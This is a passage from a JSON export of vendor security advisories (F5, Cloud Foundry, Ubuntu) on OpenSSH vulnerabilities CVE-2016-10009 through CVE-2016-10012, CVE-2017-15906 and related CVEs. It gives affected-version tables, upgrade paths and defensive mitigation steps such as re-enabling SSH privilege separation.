\nBIG-IP APM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP ASM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP DNS | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | 14.1.0 | Low | OpenSSH \nBIG-IP Edge Gateway | 11.2.1 | None | Low | OpenSSH \nBIG-IP GTM | 11.4.0 - 11.6.3 \n11.2.1 | None | Low | OpenSSH \nBIG-IP Link Controller | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP PEM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | 14.1.0 | Low | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | OpenSSH \nBIG-IP WebAccelerator | 11.2.1 | None | Low | OpenSSH \nBIG-IP WebSafe | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n | 14.1.0 | Low \n\n \n\n| OpenSSH \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable1 | None \nEnterprise Manager | 3.1.1 | None | Low | OpenSSH \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Low | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 5.4.0 \n4.6.0 | None | Low | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Low | OpenSSH \nLineRate | None | 3.0.0 - 3.1.1 | Not vulnerable1 | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2018-12-17T21:30:00", "published": "2017-01-27T03:28:00", "id": "F5:K24324390", "href": "https://support.f5.com/csp/article/K24324390", "title": "OpenSSH vulnerability CVE-2016-10011", "type": "f5", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-10010"], "description": "\nF5 Product Development has assigned ID 636460 (BIG-IP, iWorkflow, BIG-IQ, Enterprise Manager), and ID INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) lists Heuristic H64292204 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 \nscore1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, \nASM, DNS, GTM, Link Controller, PEM, \nPSM, WebAccelerator, WebSafe) | 15.x | None | Not applicable | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \n14.x | 14.0.0 - 14.0.1 | 14.1.0 - 14.1.2 \n13.x | 13.1.0 - 13.1.3 | None \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Cloud | 4.x | 4.0.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Device | 4.x | 4.2.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Security | 4.x | 4.0.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ ADC | 4.x | 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Centralized Management | 7.x | None | Not applicable | Not vulnerable | None | None \n6.x | None | Not applicable \n5.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nF5 iWorkflow | 2.x | 2.0.0 - 2.0.2 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nLineRate | 2.x | None | 2.5.0 - 2.6.1 | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \n4.x | 4.0.0 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability for BIG-IP products, F5 recommends that you re-enable privilege separate, if you have disabled it. To do so, perform the following procedure:\n\n**Impact of action:** Improper modifications to the SSH configuration can prevent SSH login. You should perform changes from the serial console.\n\n 1. Log in to the TMOS Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. To determine if you have privilege separation disabled, type the following command: \n\nlist /sys sshd\n\nIf you observe the following command output, then privilege separation is disabled, and you should proceed to step 3.\n\nsys sshd { \n include \"UsePrivilegeSeparation no\" \n}\n\nIf there is no command output, or you do not see the **UsePrivilegeSeparation no** include statement in the output, then privilege separation is enabled, and you do not need to proceed.\n\n**Note**: For more information regarding the **UsePrivilegeSeparation** option, refer to the manual page for **sshd_config**, by typing the following command from the Advanced Shell (**bash**) prompt (not **tmsh**):\n\nman sshd_config\n\n 3. To re-enable privilege separation, remove the custom include statement by typing the following command: \n\nedit /sys sshd\n\nIf there are multiple include statements, locate the **UsePrivilegeSeparation no** line, and remove just that statement.\n\nIf **UsePrivilegeSeparation no** is the only include statement, replace that statement with the word **none**.\n\nFor example:\n\nmodify sshd { \n include none \n}\n\n 4. Save your changes for the **sshd** configuration, and exit the **vi** editor.\n 5. To save the configuration, type the following command: \n\nsave /sys config\n\n 6. To exit **tmsh**, type **q** and press **Enter**. \n\n**Note**: You do not need to restart the **sshd** service; the new changes are active once you save the configuration.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-02-19T05:34:00", "published": "2017-01-24T06:03:00", "id": "F5:K64292204", "href": "https://support.f5.com/csp/article/K64292204", "title": "OpenSSH vulnerability CVE-2016-10010", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:52", "bulletinFamily": "software", "cvelist": ["CVE-2016-10012"], "description": "\nF5 Product Development has assigned ID 637629 (BIG-IP, BIG-IQ, Enterprise Manager, and F5 iWorkflow) and INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [F5 iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H62201745 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP AAM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP AFM | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP Analytics | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP APM | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP ASM | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 14.1.2 | Low | OpenSSH \nBIG-IP DNS | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP Edge Gateway | 11.2.1 | None | Low | OpenSSH \nBIG-IP GTM | 11.4.0 - 11.6.5 \n11.2.1 | None | Low | OpenSSH \nBIG-IP Link Controller | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP PEM | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | OpenSSH \nBIG-IP WebAccelerator | 11.2.1 | None | Low | OpenSSH \nBIG-IP WebSafe | 14.0.0 - 14.0.1 \n13.0.0- 13.1.3 \n12.0.0 - 12.1.5 \n11.6.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low \n\n \n\n| OpenSSH \nEnterprise Manager | 3.1.1 | None | Low | OpenSSH \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Low | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 6.0.1.1 \n4.6.0 | None | Low | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.0.2 | None | Low | OpenSSH \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable1 | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability for affected F5 products, you should permit management access over a secure network and limit secure shell (SSH) access to only trusted users. For more information about securing access to BIG-IP systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 15.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2019-11-11T22:26:00", "published": "2017-01-27T21:30:00", "id": "F5:K62201745", "href": "https://support.f5.com/csp/article/K62201745", "title": "OpenSSH vulnerability CVE-2016-10012", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:32", "bulletinFamily": "software", "cvelist": ["CVE-2016-10009"], "description": "\nF5 Product Development has assigned ID 636453 (BIG-IP, iWorkflow, BIG-IQ, and Enterprise Manager), and INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H31440025 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP AAM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP AFM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP Analytics | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP APM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP ASM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP DNS | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP GTM | 11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP Link Controller | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP PEM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP WebSafe | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH, ssh-agent \nF5 iWorkflow | 2.0.0 - 2.0.2 | None | Medium | OpenSSH, ssh-agent \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH, ssh-agent \n \n1F5 will not be developing a fix for the 11.6.x and 12.x.x software branches, and this table will not be updated with subsequent vulnerable releases in these branches. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nF5 advises that you do not use the **ssh-agent** program on F5 products.\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-01-24T22:41:00", "published": "2017-01-24T05:30:00", "id": "F5:K31440025", "href": "https://support.f5.com/csp/article/K31440025", "title": "OpenSSH vulnerability CVE-2016-10009", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "software", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "# \n\n# Severity\n\nLow\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nJann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules from untrusted directories. A remote attacker could possibly use this issue to execute arbitrary PKCS#11 modules. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10009](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10009>))\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on Unix-domain sockets when privilege separation is disabled. A local attacker could possibly use this issue to gain privileges. This issue only affected Ubuntu 16.04 LTS. ([CVE-2016-10010](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10010>))\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer memory operations. A local attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10011](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10011>))\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain shared memory manager operations. A local attacker could possibly use issue to gain privileges. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10012](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10012>))\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write operations in readonly mode. A remote attacker could possibly use this issue to create zero-length files, leading to a denial of service. ([CVE-2017-15906](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15906>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.51\n * 3363.x versions prior to 3363.48\n * 3421.x versions prior to 3421.38\n * 3445.x versions prior to 3445.24\n * 3468.x versions prior to 3468.20\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions to 3312.51\n * Upgrade 3363.x versions to 3363.48\n * Upgrade 3421.x versions to 3421.38\n * Upgrade 3445.x versions to 3445.24\n * Upgrade 3468.x versions to 3468.20\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3538-1](<http://www.ubuntu.com/usn/usn-3538-1/>)\n * [CVE-2016-10009](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10009>)\n * [CVE-2016-10010](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10010>)\n * [CVE-2016-10011](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10011>)\n * [CVE-2016-10012](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10012>)\n * [CVE-2017-15906](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15906>)\n", "edition": 5, "modified": "2018-02-01T00:00:00", "published": "2018-02-01T00:00:00", "id": "CFOUNDRY:9760638505AB3E758B4030C32D579480", "href": "https://www.cloudfoundry.org/blog/usn-3538-1/", "title": "USN-3538-1: OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "software", "cvelist": ["CVE-2018-15473", "CVE-2016-10708"], "description": "# \n\n# Severity\n\nLow\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nRobert Swiecki discovered that OpenSSH incorrectly handled certain messages. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10708)\n\nIt was discovered that OpenSSH incorrectly handled certain requests. An attacker could possibly use this issue to access sensitive information. (CVE-2018-15473)\n\nCVEs contained in this USN include: CVE-2016-10708, CVE-2018-15473\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3586.x versions prior to 3586.56\n * 3541.x versions prior to 3541.60\n * 3468.x versions prior to 3468.86\n * 3445.x versions prior to 3445.82\n * 3421.x versions prior to 3421.99\n * All other stemcells not listed.\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 170.x versions prior to 170.6\n * 97.x versions prior to 97.33\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.247.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.36.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3586.x versions to 3586.56\n * Upgrade 3541.x versions to 3541.60\n * Upgrade 3468.x versions to 3468.86\n * Upgrade 3445.x versions to 3445.82\n * Upgrade 3421.x versions to 3421.99\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 170.x versions to 170.6\n * Upgrade 97.x versions to 97.33\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.247.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.36.0 or later.\n\n# References\n\n * [USN-3809-1](<https://usn.ubuntu.com/3809-1>)\n * [CVE-2016-10708](<https://people.canonical.com/~ubuntu-security/cve/CVE-2016-10708>)\n * [CVE-2018-15473](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-15473>)\n", "edition": 2, "modified": "2018-11-20T00:00:00", "published": "2018-11-20T00:00:00", "id": "CFOUNDRY:AD75AE1BC6EAF1FB6EA7CEC33AAA7C78", "href": "https://www.cloudfoundry.org/blog/usn-3809-1/", "title": "USN-3809-1: OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules from \nuntrusted directories. A remote attacker could possibly use this issue to \nexecute arbitrary PKCS#11 modules. This issue only affected Ubuntu 14.04 \nLTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on \nUnix-domain sockets when privilege separation is disabled. A local attacker \ncould possibly use this issue to gain privileges. This issue only affected \nUbuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer memory \noperations. A local attacker could possibly use this issue to obtain \nsensitive information. This issue only affected Ubuntu 14.04 LTS and Ubuntu \n16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain shared \nmemory manager operations. A local attacker could possibly use issue to \ngain privileges. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 \nLTS. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. \n(CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write \noperations in readonly mode. A remote attacker could possibly use this \nissue to create zero-length files, leading to a denial of service. \n(CVE-2017-15906)", "edition": 5, "modified": "2018-01-22T00:00:00", "published": "2018-01-22T00:00:00", "id": "USN-3538-1", "href": "https://ubuntu.com/security/notices/USN-3538-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": 